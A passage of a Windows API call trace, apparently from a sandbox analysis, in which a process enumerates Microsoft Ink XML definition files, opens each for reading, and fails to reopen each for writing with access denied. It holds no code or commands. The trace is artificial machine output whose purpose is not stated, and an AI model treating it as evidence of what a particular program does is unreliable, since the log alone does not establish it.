"c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ja-jp.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.487] GetLastError () returned 0x5 [0083.487] GetLastError () returned 0x5 [0083.487] SetLastError (dwErrCode=0x5) [0083.487] GetLastError () returned 0x5 [0083.488] SetLastError (dwErrCode=0x5) [0083.488] GetLastError () returned 0x5 [0083.488] SetLastError (dwErrCode=0x5) [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d1b8 | out: hHeap=0x20000) returned 1 [0083.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.488] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.488] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e421ed8, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e421ed8, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e421ed8, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x3af9, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ko-kr.xml", cAlternateFileName="")) returned 1 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8aeb0 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8aeb0 | out: hHeap=0x20000) returned 1 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.488] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.488] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.489] AreFileApisANSI () returned 1 [0083.489] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml", lpUsedDefaultChar=0x0) returned 80 [0083.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6cce8 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf70 [0083.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.489] AreFileApisANSI () returned 1 [0083.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.489] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.489] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 80 [0083.489] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.489] GetFileType (hFile=0x340) returned 0x1 [0083.489] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.490] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.490] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.490] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.490] CloseHandle (hObject=0x340) returned 1 [0083.490] AreFileApisANSI () returned 1 [0083.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 80 [0083.490] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x2e430 [0083.490] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x6cce8, cbMultiByte=-1, lpWideCharStr=0x2e430, cchWideChar=80 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml") returned 80 [0083.490] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\ko-kr.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.490] GetLastError () returned 0x5 [0083.490] GetLastError () returned 0x5 [0083.491] SetLastError (dwErrCode=0x5) [0083.491] GetLastError () returned 0x5 [0083.491] SetLastError (dwErrCode=0x5) [0083.491] GetLastError () returned 0x5 [0083.491] SetLastError (dwErrCode=0x5) [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x2e430 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6cce8 | out: hHeap=0x20000) returned 1 [0083.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.491] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.491] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e448143, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e448143, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e448143, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x264b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-changjei.xml", cAlternateFileName="")) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a5c8 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.491] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a5c8 | out: hHeap=0x20000) returned 1 [0083.491] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x81638 [0083.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81638 | out: hHeap=0x20000) returned 1 [0083.492] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0083.492] AreFileApisANSI () returned 1 [0083.492] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml", lpUsedDefaultChar=0x0) returned 86 [0083.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71688 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0083.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d010 [0083.492] AreFileApisANSI () returned 1 [0083.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0083.492] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x811e8 [0083.492] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x811e8, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 86 [0083.492] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.493] GetFileType (hFile=0x340) returned 0x1 [0083.493] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x811e8 | out: hHeap=0x20000) returned 1 [0083.493] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.493] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.494] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.494] CloseHandle (hObject=0x340) returned 1 [0083.494] AreFileApisANSI () returned 1 [0083.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 86 [0083.494] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xac) returned 0x81918 [0083.494] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71688, cbMultiByte=-1, lpWideCharStr=0x81918, cchWideChar=86 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml") returned 86 [0083.494] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-changjei.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0083.494] GetLastError () returned 0x5 [0083.494] GetLastError () returned 0x5 [0083.494] SetLastError (dwErrCode=0x5) [0083.494] GetLastError () returned 0x5 [0083.494] SetLastError (dwErrCode=0x5) [0083.494] GetLastError () returned 0x5 [0083.494] SetLastError (dwErrCode=0x5) [0083.494] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x81918 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71688 | out: hHeap=0x20000) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e3fbc74, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e3fbc74, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e3fbc74, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x2b3b, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="zh-dayi.xml", cAlternateFileName="")) returned 1 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d090 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x5cf40 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5cf40 | out: hHeap=0x20000) returned 1 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x90) returned 0x8a660 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xd6) returned 0x5a6b8 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x8a660 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0083.495] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xb0) returned 0x812a0 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5a6b8 | out: hHeap=0x20000) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x812a0 | out: hHeap=0x20000) returned 1 [0083.495] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0083.496] AreFileApisANSI () returned 1 [0083.496] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml", lpUsedDefaultChar=0x0) returned 82 [0083.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0083.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.496] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0083.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf90 [0083.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0083.496] AreFileApisANSI () returned 1 [0083.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0083.496] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5fe78 [0083.496] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5fe78, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 82 [0083.496] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x340 [0083.496] GetFileType (hFile=0x340) returned 0x1 [0083.496] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fe78 | out: hHeap=0x20000) returned 1 [0083.496] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0083.497] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0083.497] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0083.497] CloseHandle (hObject=0x340) returned 1 [0083.497] AreFileApisANSI () returned 1 [0083.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 82 [0083.497] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa4) returned 0x5f008 [0083.497] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x71620, cbMultiByte=-1, lpWideCharStr=0x5f008, cchWideChar=82 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\fsdefinitions\\main\\zh-dayi.xml") returned 82 [0083.497] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft 